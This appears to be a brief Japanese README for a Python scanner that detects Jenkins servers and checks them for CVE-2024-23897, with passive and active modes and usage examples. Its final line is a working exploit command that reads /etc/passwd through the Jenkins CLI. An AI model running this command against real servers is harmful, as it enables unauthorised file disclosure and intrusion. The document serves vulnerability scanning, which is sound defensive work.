
Jenkins環境を検出し、CVE-2024-23897をチェックします
Jenkins環境を発見し、CVE-2024-23897をチェックします
パスをテスト: /、/login、/oops、/api/json、/cli、/jenkins/、/jenkins/api/json
以下の方法で識別:
パッシブ(デフォルト): 検出されたバージョンをしきい値と比較:
アクティブ(--active): Jenkins CLIのバイナリプロトコルのハンドシェイクをHTTPで送信します。サーバーが200 + Content-Type: application/octet-streamで応答した場合、CLIチャネルが開いており、エクスプロイトが適用可能であることを確認します。
python jenkins_scan.py -f urls.txt
python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt
python jenkins_scan.py -f urls.txt -t 20 -v --no-color
java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"